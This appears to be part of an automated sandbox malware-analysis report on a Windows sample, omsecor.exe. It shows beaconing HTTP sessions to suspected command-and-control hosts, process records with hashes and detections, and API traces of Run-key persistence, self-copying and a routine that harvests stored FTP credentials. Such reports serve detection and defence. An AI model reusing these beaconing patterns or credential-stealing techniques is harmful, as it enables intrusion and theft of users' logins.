15	192.168.2.4	49851	193.166.255.171	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:04.203615904 CET	169	OUT	GET /508/485.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49899	193.166.255.171	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:12.797590971 CET	169	OUT	GET /333/645.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49945	15.197.204.56	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:21.393177986 CET	174	OUT	GET /978/939.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: mkkuei4kdsz.com Connection: Keep-Alive
Nov 1, 2024 16:05:22.052130938 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 15:05:21 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49951	52.34.198.229	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:22.173016071 CET	286	OUT	GET /292/164.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473503\|1730473447\|16\|4\|0
Nov 1, 2024 16:05:23.012407064 CET	340	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 15:05:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473522\|1730473447\|17\|5\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49958	193.166.255.171	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:23.238634109 CET	169	OUT	GET /263/482.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50008	193.166.255.171	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:31.846018076 CET	169	OUT	GET /908/776.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50023	15.197.204.56	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:40.454207897 CET	173	OUT	GET /785/70.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: mkkuei4kdsz.com Connection: Keep-Alive
Nov 1, 2024 16:05:41.083230019 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 15:05:41 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50024	52.34.198.229	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:41.215163946 CET	286	OUT	GET /763/794.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473522\|1730473447\|17\|5\|0
Nov 1, 2024 16:05:42.038714886 CET	340	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 15:05:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473541\|1730473447\|18\|6\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50025	193.166.255.171	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:42.266555071 CET	169	OUT	GET /734/112.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50026	193.166.255.171	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:50.861746073 CET	169	OUT	GET /562/252.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50027	15.197.204.56	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:59.523369074 CET	174	OUT	GET /488/933.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: mkkuei4kdsz.com Connection: Keep-Alive
Nov 1, 2024 16:06:00.210562944 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 15:06:00 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50028	52.34.198.229	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:06:00.351746082 CET	286	OUT	GET /776/947.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruot Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473541\|1730473447\|18\|6\|0
Nov 1, 2024 16:06:01.423464060 CET	340	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 15:06:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473561\|1730473447\|19\|7\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:03:53
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\bd0wJGTae5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bd0wJGTae5.exe"
Imagebase:	0x400000
File size:	82'768 bytes
MD5 hash:	CC4504807E32F91497D2C5A8DD1061F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:03:53
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Roaming\omsecor.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\omsecor.exe
Imagebase:	0x400000
File size:	82'768 bytes
MD5 hash:	DC5D106C7C04B52DF85467D6D647221A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:04:06
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\omsecor.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\omsecor.exe
Imagebase:	0x400000
File size:	82'768 bytes
MD5 hash:	1F90E0A8D463721EBCD937EF25C65D05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:04:43
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\omsecor.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\omsecor.exe /nomove
Imagebase:	0x400000
File size:	82'768 bytes
MD5 hash:	1F90E0A8D463721EBCD937EF25C65D05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.9%
Total number of Nodes:	1140
Total number of Limit Nodes:	6

Executed Functions

Function 004075D4 Relevance: 22.6, APIs: 15, Instructions: 128
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
GetFileSize.KERNEL32(?,00000000), ref: 0040762E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
CloseHandle.KERNELBASE(?), ref: 00407714
CloseHandle.KERNEL32(?), ref: 00407719

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
String ID:
API String ID: 2296163861-0
Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

Function 0040ABD9 Relevance: 3.0, APIs: 2, Instructions: 26
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
FindClose.KERNEL32(00000000), ref: 0040AC0F

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: FindOpen$CloseFileFirst
String ID:
API String ID: 3155378417-0
Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

Function 0040B346 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 153
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D

Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22

GetLastError.KERNEL32(00000004), ref: 0040B3CA
Sleep.KERNEL32(00002710), ref: 0040B3F7
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
ExitProcess.KERNEL32 ref: 0040B44D

Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

GetLastError.KERNEL32(00000004), ref: 0040B48D
GetLastError.KERNEL32(00000004), ref: 0040B49A
ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
GetLastError.KERNEL32(00000004), ref: 0040B500

Strings

IueiOod, xrefs: 0040B3A8
/nomove, xrefs: 0040B4D9
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040B3AD
opeqmc.exe, xrefs: 0040B36E

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
API String ID: 3692109554-477663111
Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

Function 0040AC20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

Strings

IueiOod, xrefs: 0040AC50, 0040AC82
/nomove, xrefs: 0040AC23
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040AC39, 0040AC3E, 0040AC6C

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 3546245721-4228964922
Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

Function 0040AAFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60

Strings

/nomove, xrefs: 0040AB10

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CharLower$CommandFileLineModuleName
String ID: /nomove
API String ID: 1338073227-1111986840
Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

Function 00407727 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400,74DF0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
GetLastError.KERNEL32(00000004), ref: 004077A9

Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
String ID:
API String ID: 1536607067-0
Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

Function 004077F0 Relevance: 3.0, APIs: 2, Instructions: 30
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00407800
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CreateProcess_memset
String ID:
API String ID: 1177741608-0
Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

Function 004069C0 Relevance: 3.0, APIs: 2, Instructions: 25
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

Non-executed Functions

Function 004039EA Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 163
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
StrStrIW.SHLWAPI(?,?), ref: 00403ACF
StrStrIW.SHLWAPI(?,?), ref: 00403AE4
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36

Strings

default, xrefs: 00403A8B
ftp://%s:%s@%s, xrefs: 00403B50
username, xrefs: 00403AA9
host, xrefs: 00403A9A
connections, xrefs: 00403A79
password, xrefs: 00403AB8
SOFTWARE\Ghisler\Total Commander, xrefs: 004039F3

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: PrivateProfileString$AllocHeap
String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
API String ID: 2479592106-2015850556
Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
